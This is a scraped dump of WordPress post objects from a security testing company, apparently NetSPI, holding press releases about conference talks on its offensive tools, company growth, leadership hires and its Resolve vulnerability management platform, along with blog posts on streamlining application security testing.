When: Wednesday, August 7 at10:30 a.m., 1:00 p.m., and 4:30 p.m.; Thursday, August 8 at 11:00 a.m. Where: NetSPI Booth #105 Presenter: Scott Sutherland Session Summary: PowerUpSQL provides insight into the risks that misconfigured SQL Servers pose to enterprise environments. See how PowerUpSQL can be used to perform SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post-exploitation actions such as Active Directory Recon and OS command execution. We’ll share an msbuild script that can be used to launch an offensive SQL Server shell with data exfiltration capabilities. Get PowerUpSQL at https://github.com/NetSPI/PowerUpSQL/wiki

Attacking Azure Environments with MicroBurst

When: Wednesday, August 7 at 11:00 a.m., 1:30 p.m., and 5:00 p.m.; Thursday, August 8 at 10:30 a.m. Where: NetSPI Booth #105 Presenter: Karl Fosaaen Session Summary: Azure tenant misconfigurations are extremely common.  See how MicroBurst can be used to perform service discovery, weak configuration auditing, privilege escalation, and other post exploitation actions such as password recovery and OS command execution. Get a preview of an update to MicroBurst. Get MicroBurst at https://github.com/NetSPI/MicroBurst

Inveigh New Release Review

When: Wednesday, August 7 at 11:30 a.m., 2:00 p.m., and 5:30 p.m.; Thursday, August 8 at 11:30 a.m. Where: NetSPI Booth #105 Presenter: Kevin Robertson Session Summary: Learn about the new 1.5 release of Inveigh, a Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer, and man-in-the-middle tool. Plus, we’ll delve into the first non-development release of InveighZero, the C# version of Inveigh. See new features, differences, and Windows post-exploitation use cases for both tools. Get Inveigh at https://github.com/Kevin-Robertson/Inveigh

Learn more at NetSPI Booth #105

In addition to the presentations, attendees will have the opportunity to learn more about the following:

Application and Infrastructure Security Testing Services

See how NetSPI’s security testing services are designed to address bandwidth, expertise gaps, and compliance needs. NetSPI provides:
  • Application Penetration Testing Services
  • Network Penetration Testing Services
  • Cloud Infrastructure Penetration Testing Services
  • NetSPI Resolve™ Threat and Vulnerability Management Software
  • Security Program Transformation Services
NetSPI’s penetration testing services cover everything from mobile and web apps to cloud, network, mainframe, IoT, and more. Additional strategic services include threat and vulnerability management assessments, and attack simulation services that encompasses red team, social engineering, detective controls testing, and more.

NetSPI Resolve™ Vulnerability Management and Orchestration Software

Many companies run multiple vulnerability scanners, but making sense of the data, plus manual penetration testing reports and remediation status from across a global enterprise, is a massive manual effort. Resolve™ correlates all vulnerability data across your organization into a single view, so you can find, prioritize, and fix vulnerabilities faster. With data integration, Resolve™ can also show the remediation status of identified vulnerabilities. This results in vulnerability management processes that scale for global organizations. Learn how NetSPI Resolve™ removes the risk of managing vulnerabilities in spreadsheets, and the arduous administrative tasks that cause inefficiencies. NetSPI Resolve™ reduces your risk while increasing your security testing coverage by more than fifty percent without adding additional staff.

Schedule a Security Advisory Sessions with NetSPI

Sign up for a one-on-one security advisory session or a software demo at Black Hat USA 2019.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes penetration testing services, vulnerability management software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn. [post_title] => NetSPI to Present and Exhibit at Black Hat USA 2019 Information Security Conference [post_excerpt] => NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2019, Aug. 7-8 (booth #105) in Las Vegas, NV. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-to-present-and-exhibit-at-black-hat-usa-2019-information-security-conference [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:15 [post_modified_gmt] => 2021-04-14 06:54:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13214 [menu_order] => 331 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [55] => WP_Post Object ( [ID] => 13210 [post_author] => 91 [post_date] => 2019-03-26 07:00:52 [post_date_gmt] => 2019-03-26 07:00:52 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC, the leading provider of application and network security testing solutions, announced today it achieved a 50% year-over-year revenue increase in 2018 as it continued to expand its product line up, staff, clients, and office locations. “In 2018, NetSPI evolved into a high performance, high growth security company,” said President and Chief Operating Officer, Aaron Shilts. “We achieved significant growth driven from our top accounts, adding new clients, and taking market share from competitors in the penetration testing space.” In a mature market that is growing less than 10% per year, NetSPI is growing at more than five times that rate due to the increased efficiency and accuracy of its Resolve™ platform. To manage this rapid growth, NetSPI strengthened its senior management team with the addition of two industry veterans, Chief Financial Officer, Jeni Bahr, and Chief Information Security Officer, Bill Carver.  The company also added more staff, bringing the total to over 100 employees in Q418. To accommodate a larger workforce the company completed significant renovations to its Minneapolis corporate headquarters and opened its first office in the Pacific Northwest, a region that delivered significant revenue in 2018. Last year also marked the first full year of operation for the company’s Dallas office, ground zero for new product development.  Due to the efforts of the development team, NetSPI rolled out a number of new offerings in 2018. These included a complete rebuild of the company’s flagship Resolve™ software platform as well as new offerings spanning test and vulnerability management, cloud security, and mainframe testing. “With the launch of these new capabilities we were able to move beyond tactical penetration testing and vulnerability assessments to offer more strategic services,” said Shilts. “Looking forward, I expect us to increasingly help leading companies define and then build their security programs.” Last year NetSPI also increased its thought leadership activities and ramped up customer communication with the launch of the Our Thinking blog and hosted its first customer advisory board at The Biltmore in Asheville, NC. This new annual event brings together some of NetSPI’s largest customers to help set current and future product direction, prioritize new product capabilities, and gain insights into current challenges and markets. The company also hosted its largest class size ever at NetSPI University, more than doubling the number of students compared to 2017. “Attracting and retaining qualified talent is the number one challenge for cybersecurity leaders today, so NetSPI doubled-down on our rigorous training program, helping develop the next generation of penetration testing experts," said Shilts. Looking forward, NetSPI expects another strong year of growth in 2019 with increasing revenue as a result of bringing the new Resolve™ 7 platform to market as well as continued account and geographic expansion.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes security testing services, vulnerability orchestration software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn. [post_title] => NetSPI Announces 50% Year-Over-Year Revenue Growth And Rapid Expansion [post_excerpt] => The leading provider of application and network security testing solutions, announced today it achieved a 50% year-over-year revenue increase in 2018 as it continued to expand its product line up, staff, clients, and office locations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-announces-50-year-over-year-revenue-growth-and-rapid-expansion [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:18 [post_modified_gmt] => 2021-04-14 06:54:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13210 [menu_order] => 335 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [56] => WP_Post Object ( [ID] => 13208 [post_author] => 91 [post_date] => 2019-02-19 07:00:24 [post_date_gmt] => 2019-02-19 07:00:24 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at RSA Conference 2019 (Booth 4400, North Expo) in San Francisco, March 4-8, 2019. NetSPI will showcase its cybersecurity testing services and NetSPI Resolve™ vulnerability management and orchestration platform, which help organizations to scale and operationalize threat and vulnerability management programs. At RSA, NetSPI’s security experts will provide complimentary one-on-one sessions with attendees upon request to discuss the attendees security needs and to share best practices and insights for security and compliance. Attendees are encouraged to connect with NetSPI at RSA: NetSPI will also participate in the Expo Pub Crawl at RSA on Wednesday, March 6, 4:30 – 6:00 p.m. More about NetSPI’s services and solutions to be exhibited at RSA: Application & Infrastructure Security Testing Services:  See how NetSPI’s security testing services are designed to address bandwidth, expertise gaps, and compliance needs. NetSPI provides penetration testing services of mobile and web apps to cloud, network, mainframe, IoT, and more. Additional strategic services include threat and vulnerability management assessments, and attack simulation services for red team, social engineering, detective controls testing, and more. NetSPI Resolve™ Vulnerability Orchestration Software: See how NetSPI Resolve™ enables the orchestration of cyber security efforts across an entire organization to shorten the vulnerability management life cycle and improve the organization’s security posture. Businesses are flooded by vulnerability data that is often managed with manual and time-consuming processes. Resolve™ brings order to this chaos by helping customers fix vulnerabilities faster – and provide the insight they need to triage and prioritize remediation efforts to focus cybersecurity resources and reduce risk.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes security testing services, vulnerability orchestration software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn. [post_title] => NetSPI to Exhibit at RSA Conference 2019 [post_excerpt] => NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at RSA Conference 2019 (Booth 4400, North Expo) in San Francisco, March 4-8, 2019. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-to-exhibit-at-rsa-conference-2019 [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:24 [post_modified_gmt] => 2021-04-14 06:54:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13208 [menu_order] => 339 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [57] => WP_Post Object ( [ID] => 13206 [post_author] => 91 [post_date] => 2019-01-30 07:00:47 [post_date_gmt] => 2019-01-30 07:00:47 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC, the leader in orchestrated vulnerability management and security testing, has announced the launch of NetSPI Resolve™, an end-to-end solution for vulnerability management and orchestration. Companies face a growing number of vulnerabilities, leaving them at risk for data breaches that are expensive and damaging to their reputation. Resolve™ enables the orchestration of cyber security efforts across an entire organization, so businesses can shorten the vulnerability management life cycle and improve their security posture. “Businesses are flooded by vulnerability data from scanners and pentesters, but all that information doesn't add up to a coherent picture. Data piles up from multiple security testing sources, and there is no consistent way to track or prioritize vulnerabilities. It’s a manual and time-consuming process to try to make sense of your risk exposure, let alone track and report on it,” said Deke George, NetSPI CEO. “Resolve™ essentially brings order to this chaos. Not only does it help customers fix vulnerabilities faster – but it also gives them the insight they need to triage and prioritize remediation efforts, so they can focus their resources on the most critical issues and continuously reduce their risk.” The number of disclosed vulnerabilities has increased each year. In an attempt to find them all, many organizations use multiple scanners along with in-house or third-party manual penetration testing, generating a large amount of overlapping data. Resolve™ automatically correlates this disparate data into a single system of record, allowing organizations to coordinate security teams’ efforts, track remediation progress, and report on vulnerabilities across teams and departments. The result is improved visibility of vulnerabilities, faster time to remediation, and reduced exposure to risk. “There aren’t enough cyber security professionals – the unemployment rate for cyber security professionals is about zero,” George said. “The only way organizations can close critical security gaps is by automating and orchestrating security tasks to reduce manual overhead, so they can get more done without more employees or longer hours. We’re excited to offer customers a solution to some of their biggest cyber security challenges.” NetSPI, which also offers pentesting and vulnerability management services, initially developed the platform to support execution and delivery of services to its customers. The platform was designed to ingest and correlate vulnerabilities from disparate sources, standardize the vulnerability knowledge base and remediation recommendations, ensure consistency in pentest execution and resulting outcomes, and track and report progress with actionable information to prioritize resources. NetSPI Resolve™ offers the same capabilities to customer’s internal security teams, as a cloud-based solution that can scale to handle tens of millions of vulnerabilities. NetSPI Resolve™ will be showcased at a series of happy hour events during the last two weeks of March in Minneapolis, New York City, Atlanta, Seattle, Dallas, and Toronto. To register or learn more, visit Resolve™.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes security testing services, vulnerability orchestration software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn. [post_title] => NetSPI Launches New Vulnerability Management and Orchestration Platform [post_excerpt] => NetSPI Resolve™ automatically correlates vulnerability data from any source into a single view for the whole organization so you can prioritize and fix vulnerabilities faster, and continuously reduce your risk exposure. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-launches-new-vulnerability-management-and-orchestration-platform [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:28 [post_modified_gmt] => 2021-04-14 06:54:28 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13206 [menu_order] => 340 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [58] => WP_Post Object ( [ID] => 13202 [post_author] => 91 [post_date] => 2019-01-24 07:00:08 [post_date_gmt] => 2019-01-24 07:00:08 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC, the leading provider of threat and vulnerability orchestration and security testing, announced today it will partner with University of Minnesota Masonic Children’s Hospital as part of a new philanthropic program called “NetSPI Gives.” “While NetSPI continues to see business growth both nationally and globally, we haven’t forgotten about giving back to our local community,” said Vice President of People Operations, Meghan Hermann. As a leading high-tech, research-focused cybersecurity company, NetSPI could immediately relate to the groundbreaking research going on at University of Minnesota Masonic Children’s Hospital. In particular, the hospital’s pediatric cancer advancements struck a chord. “We were so excited to connect with the team at the hospital and knew immediately that we needed to make a big contribution,” said Hermann. “All 110 of our employees from across the country will be together in Minneapolis this week where we will kick-off the partnership with the hospital.” To manage all of the company’s philanthropic activities so they can make the biggest impact possible, it decided to create a program called NetSPI Gives. As part of the new program, the company plans to donate time and money as part of a charitable initiative each quarter. “Our physician-scientists are pursuing new avenues of research to develop powerful alternatives that are even safer and more effective treatments for childhood cancers,” said Nick Engbloom, Director of Community Partnerships for University of Minnesota Masonic Children’s Hospital. “We are excited to partner with NetSPI’s volunteer and philanthropic efforts, which will play an essential role in elevating the impact on pediatric cancer research here.” “Our employees are always motivated by opportunities to give back to our community and are thrilled to be making a significant and lasting impact on children at the hospital," said Hermann. "We're excited about this important step in NetSPI’s growth and look forward to continuing to make a difference in the local community.” Currently, plans are underway for a number of fundraising and charitable events at the hospital involving NetSPI staff. For more information and announcements, follow NetSPI on Facebook, Twitter, and LinkedIn.

About University of Minnesota Masonic Children's Hospital

University of Minnesota Masonic Children's Hospital brings hope and healing to children and families by caring for one child at a time, while advancing education, research, and innovation on behalf of all children. By working as one health care team centered on its youngest patients, University of Minnesota Masonic Children’s Hospital and pediatric clinics create exceptional care experiences for children and their families in Minnesota and around the world.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes security testing services, vulnerability orchestration software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn. Media Contacts Krystle Barbour Media and Public Relations Specialist M Health +1.612.626.2767 [post_title] => NetSPI Partners with University of Minnesota Masonic Children’s Hospital as Part of New Philanthropic Program [post_excerpt] => NetSPI announces it will partner with University of Minnesota Masonic Children’s Hospital as part of a new philanthropic program called “NetSPI Gives.” [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-partners-with-university-of-minnesota-masonic-childrens-hospital-as-part-of-new-philanthropic-program [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:33 [post_modified_gmt] => 2021-04-14 06:54:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13202 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [59] => WP_Post Object ( [ID] => 13212 [post_author] => 91 [post_date] => 2019-01-12 07:00:59 [post_date_gmt] => 2019-01-12 07:00:59 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC, the leader in vulnerability management tools and penetration testing services, has released the NetSPI Resolve™ vulnerability management integration framework. The data integration tool allows financial, healthcare, retail, technology, and other businesses to automate time-consuming manual processes and improve vulnerability management. More than 20,000 new software vulnerabilities are identified annually. Cyber-attackers use these vulnerabilities to breach networks, websites, and applications – and steal sensitive data. Many companies run multiple vulnerability scanners in an effort to find and fix vulnerabilities before attackers exploit them. Unfortunately, each vulnerability scanner uses its own data format and definitions. Making sense of the scanner data, manual penetration testing reports and remediation status from across a global enterprise is a massive manual effort. NetSPI Resolve™ vulnerability management and orchestration platform makes sense of the data from all these sources and makes a risk-based assessment to identify the most critical vulnerabilities to prioritize for remediation. With data integration, Resolve™ can also show the remediation status of identified vulnerabilities – whether their status is open, in remediation, or risk-accepted. The result is vulnerability management processes that scales for global organizations. The NetSPI Resolve™ vulnerability management integration framework enables companies to: Save time with automated data flows. The visual integration framework lets users automate the bidirectional flow and mapping of disparate data – quickly and easily – while maintaining the performance of existing vulnerability management workflows. Connect popular tools with out-of-the-box integrations. The integration framework supports the most popular application scanners, network scanners, ticketing, remediation, and governance tools, including AppScan, Qualys, Jira, Archer, and more. Build custom data integrations. Users can build their own integrations for other tools using Java, JavaScript, Ruby, Python, or Jython. Get data from structured and unstructured sources. The integration framework can connect Resolve™ to enterprise data sources, such as corporate databases and Active Directory. In addition, Resolve™ can ingest data from semi-structured and unstructured data sources, such as penetration testing reports. Push data out to other systems. Users can send notifications when vulnerabilities reach a threshold and push vulnerability data to remediation ticketing systems and governance, risk, and compliance (GRC) systems. Join NetSPI at the Gartner Security & Risk Management Summit The Resolve™ integration framework will be demonstrated publicly for the first time in Booth 1017 at the Garner Security & Risk Management Summit, June 17-20 in National Harbor, MD. Attendees can request a private demo, or attend the vulnerability management panel, Best practices for updating your vulnerability management program, on Tuesday, June 18 at 1:15 p.m. Learn more about Resolve™ at here.

About the Gartner Security & Risk Management Summit 2019

The Gartner Security & Risk Management Summit 2019 features programs focusing on key topics such as business continuity management, cloud security, privacy, securing the Internet of Things (IoT), and the chief information security officer (CISO) role. Gartner analysts will explain the latest information on new threats to enable digital business in a world of escalating risk.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes penetration testing services, vulnerability management software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn. [post_title] => NetSPI Releases Vulnerability Management Integration Framework [post_excerpt] => Out-of-the-box and build-your-own integrations support bidirectional data flow between testing, ticketing, remediation, and governance tools. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-releases-vulnerability-management-integration-framework [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:36 [post_modified_gmt] => 2021-04-14 06:54:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13212 [menu_order] => 342 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [60] => WP_Post Object ( [ID] => 1809 [post_author] => 91 [post_date] => 2019-01-04 07:00:08 [post_date_gmt] => 2019-01-04 07:00:08 [post_content] =>

Software development teams are often at odds with application security teams, specifically penetesting teams. In this post we explore why this happens and what five steps you can take to improve participation in security testing by the development team in your organization.

Conflicting Objectives

At a macro view, the objectives of software development and application security align. Organizations need software and security to operate. But at the micro level, each team has very different objectives that don’t align.

Development teams are measured on delivering functional code on time and on budget, yet development teams regularly struggle to meet release deadlines. There are various reasons as to why, some avoidable and some not. Common reasons include scope creep, scope underestimation, unforeseen roadblocks, and bad planning.

The application security team is at least partially measured on how many vulnerabilities they find. If they don’t find vulnerabilities, that means the development team did a good job, but the security team has a hard time justifying the value they provide. Security teams scrutinize applications deeply because their reputation depends on what they can find. More often than not, they succeed in doing their jobs. The vulnerabilities they find have to be fixed.

The application security testing (AST) process further increases the deadline pressure experienced by development teams. Fixing vulnerabilities takes time and delays code pushes. The outcome is a double whammy. First, development team’s ability to deliver on time is put in jeopardy. Second, the developers feel as though their own reputations have been tarnished if their code is found to have flaws.

It’s no wonder development teams often chafe, drag their feet, or otherwise hinder the application security testing process. They submit to testing because it’s required, but they are generally not willing participants.

Evaluating Possible Solutions

Rational arguments for application security are already well understood by developers. Training and explanations do nothing to align the conflicting objectives and outcome of application security testing. Reasoning and rationale can only increase willingness so much.

Some organizations try to bake security into the software development lifecycle (SDLC). Time is allocated for application security testing between the release date and the production target. As development projects slip, security is often the first thing to be pushed out so the deadline can be met. Development teams would rather get all the features in and risk an unknown number of security flaws, hoping none exist. This reasoning leads back to the conflicting objectives.

Automation built in during the SDLC to help catch problems early can reduce the findings during a pentest. There is a diminishing return, though. More scanners will not eliminate all of the vulnerabilities found during a pentest. And this does not solve the conflicting objectives.

Five Steps to Buy in

The best security solutions are also the most convenient. Security is often viewed as a necessary evil by those burdened by the requirements. Reducing the effort needed is the best way to improve buy-in and willingness.

Application security testing orchestration (ASTO) delivers on convenience in many ways:

Step 1

Test scheduling should be as simple as possible. Ideally it should be possible to allow self-service for development teams to view, filter, and schedule security testing slots based on the availability of application security testing resources. This approach reduces the human effort needed to coordinate and schedule tests.

Software delivery dates often slip. Rescheduling pentesting at the last minute can cause a great deal of disruption to the security team. In this case, a backlog of scheduled tests can provide a buffer. For the backlog to work, scoping information for scheduled tests must be ready well ahead of time.

Step 2

Make the process of scoping security testing as seamless and convenient as possible. Your application security testing orchestration tool should track the application scope information on an ongoing basis. Annual application security tests should allow for development stakeholders to carry over prior information. Stakeholders should review and revise it prior to testing, but it’s much easier to revise than to write the entire form again.

Passing a Word document back and forth with comments and track changes gets messy and is hard to manage. Scoping questionnaires should be collaborative web interfaces where security and development can both participate. After the development team has submitted revised scoping information, the security team should review it quickly and verify it from a queue.

If any errors or discrepancies are found, communication should be easy to follow and track. Comments and markup on the scoping form are an ideal way to enable the communication flow. The web form can be mapped into a database in a standardized way and used in automated processes, which is something a Word document cannot do.

Step 3

Vulnerabilities will be found during testing. Providing full context of how to fix the vulnerabilities with high-quality remediation instructions can save the developers much time. Avoid making the developers work to figure out how to fix the problem by providing a remediation instructions library with vetted content. Sure, pentesters can write instructions, but consistency and quality will come from a standard library.

Step 4

Developers work in their own tools. Giving them a laundry list .CSV file of vulnerabilities or a static report is not going to make it easy for them. Don’t make them load the list into their tool or force them to track on a spreadsheet. Manual processes risk losing track of vulnerabilities and increasing developers’ workloads.

Integrate directly with the development SCRUM tool. Push vulnerabilities into developers’ existing workflow with the included remediation instructions to save them time and effort . Having a bidirectional sync with the SCRUM tool also makes it much easier to track remediation.

Step 5

Retesting and verifying that vulnerabilities have been fixed should be expedient and as automated as possible. Waiting to retest for weeks or months after a developer has fixed the problem will only increase the frustration the developers feel. Some scanners can automatically verify a vulnerability has been fixed, which can be triggered based on an application security testing orchestration process. Adding retest tasks to a queue for the application security team and having a service level agreement (SLA) on the task will also ensure that the security team is following up on the fix in a timely fashion.

Conclusion

While it may not be possible to entirely remove the conflict between application security and software development, it’s certainly possible to ease the inconvenience. Development teams understand the need for security. The experience is generally the problem. Improve the user experience for your developers, just like you would for any customer, and you will have a much easier time getting buy-in for the application security testing process.

[post_title] => Make it Easy on the Development Team [post_excerpt] => Software development teams are often at odds with application security teams, specifically penetesting teams. In this post we explore why this happens and what five steps you can take to improve participation in security testing by the development team in your organization. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => make-it-easy-on-the-devs [to_ping] => [pinged] => [post_modified] => 2021-04-14 00:57:20 [post_modified_gmt] => 2021-04-14 00:57:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1809 [menu_order] => 343 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [61] => WP_Post Object ( [ID] => 13200 [post_author] => 91 [post_date] => 2018-12-03 07:00:56 [post_date_gmt] => 2018-12-03 07:00:56 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC,  the leader in orchestrated vulnerability management and security testing, has named Bill Carver as the company’s first Chief Information Security Officer (CISO). As NetSPI’s top security officer, Carver will do for NetSPI what we already do for our clients: ensure our data, communications, systems, assets, and vulnerability orchestration solutions are secure.    Additionally, Carver will leverage his experience managing diverse and complex cybersecurity strategies to safeguard both NetSPI and its global customers from new types of attacks and vulnerabilities. “As an organization, we are committed to being a leader in information security and protection. By creating this role, we are demonstrating that security is embedded in every aspect of our business, from IT architecture and software development to operations, policies, and procedures,” said Aaron Shilts, President and COO. “And Bill is perfect for the role. His passion for helping organizations improve their security posture will benefit not only NetSPI, but our clients as well.” Carver, previously NetSPI’s practice director for advisory services, has more than two decades of information security experience. Prior to joining NetSPI, he helped establish consulting services capabilities at Optiv and FishNet Security, focusing on the evaluation and improvement of information security programs. He has also held information security roles at Merck and CitiFinancial. “In today’s globally connected society, cybersecurity is more critical than ever. I am thrilled to contribute to NetSPI’s vision both in leading our internal cybersecurity efforts as well as providing strategic direction to help support our client’s threat and vulnerability management programs,” Carver said.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com. [post_title] => NetSPI Names Bill Carver as New Chief Information Security Officer [post_excerpt] => NetSPI LLC, the leader in orchestrated vulnerability management and security testing, has named Bill Carver as the company’s first Chief Information Security Officer (CISO). [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-names-bill-carver-as-new-chief-information-security-officer [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:40 [post_modified_gmt] => 2021-04-14 06:54:40 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13200 [menu_order] => 345 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [62] => WP_Post Object ( [ID] => 1773 [post_author] => 91 [post_date] => 2018-11-16 07:00:05 [post_date_gmt] => 2018-11-16 07:00:05 [post_content] =>

Many organizations use manually intensive processes when onboarding their application security assessments. Compare the following process with your own experience:

  • Schedule the application security assessment.
  • Assign internal/external penetration testers to conduct the test.
  • Conduct the application security assessment and/or vulnerability scan.
  • Report application vulnerabilities to the remediation team using a method of copy-and-paste. from various systems.
  • Report multiple duplicates and false positives that had been verified previously.

With a process like the one above, your organization will struggle with delayed timelines and duplicate efforts. And because the process is manual, each step in your lifecycle is prone to human-error. In highly regulated industries, this wasteful approach consumes valuable resources, when resources are already lacking.

Ask the following five questions to assess the strength of your organization’s vulnerability management program:

  • Does your organization have multiple ways for application owners to request application assessments?
  • Do you struggle to scope the assessment properly?  For example, can you acquire details such as how dynamic pages are within your web app, the number of user roles, the application’s code language, etc.?
  • Do you have to follow-up with the application owners for more information or direction after the scoping questionnaires are emailed to the pentesting team?
  • After receiving completed questionnaires, do you send login credentials via email to conduct authenticated application security tests?
  • Do you email the pentesting team a copy of the concluded assessment results, regardless of the type of test: static application security testing (SAST), dynamic application security testing (DAST) or a manual penetration test?

If you rely on email and manual processes like these for your vulnerability management program, it is probably time for a vulnerability management program overhaul!

Reduce Your Administrative Overhead by 40% to 60%

Even without the headache of sifting through duplicate findings and incurring delays, we have found that organizations can spend a from 6 to 10 hours onboarding applications into the vulnerability assessment process. Organizations we’ve interviewed say this massive administrative overhead is reduced by 40%-60% with NetSPI Resolve™, the first commercially available security testing automation and vulnerability correlation software platform.

NetSPI Resolve reduces the time required to identify and remediate vulnerabilities, providing pentesters and their teams with comprehensive automated reporting, ticketing, and SLA management. By utilizing these Resolve features, along with the automation of questionnaire publication, organizations achieve streamlined communication and can complete vulnerability assessments faster, without sacrificing the quality of assessment results.

By reducing – and in some cases, even eliminating – the time needed for administrative tasks, pentesters are able to focus more on what they do best: test.

[post_title] => Five Signs Your Application Security Assessment Process Needs a Reboot [post_excerpt] => With a process like the one above, your organization will struggle with delayed timelines and duplicate efforts. And because the process is manual, each step in your lifecycle is prone to human-error. In highly regulated industries, this wasteful approach consumes valuable resources, when resources are already lacking. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => five-signs-your-application-security-assessment-process-needs-reboot [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:41:56 [post_modified_gmt] => 2021-04-14 06:41:56 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1773 [menu_order] => 347 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [63] => WP_Post Object ( [ID] => 1745 [post_author] => 91 [post_date] => 2018-10-31 07:00:03 [post_date_gmt] => 2018-10-31 07:00:03 [post_content] =>

Data silos happen naturally for many reasons. As an organization grows and their security maturity evolves, they’ll likely end up with one or more of these scenarios.

Using multiple security testing scanners: As the security landscape evolves, so does the need for security testing tools, including SAST and DAST/IAST tools, network perimeter tools, internal or third-party penetration testing, and adversarial attack simulation. Companies that were once functioning with one SAST, DAST and network tool each will begin to add others to the toolkit, possibly along with additional pentesting companies and ticketing and/or GRC platforms.

Tracking remediation across multiple tools: One business unit’s development team could be on a single instance of JIRA, for example, while another business unit is using a separate instance, or even using a completely different ticketing system.

What Problems Do Data Silos Create in a Security Testing Environment?

Data silos can create several problems in a security testing environment. Two common challenges we see are duplicate vulnerabilities and false positives.

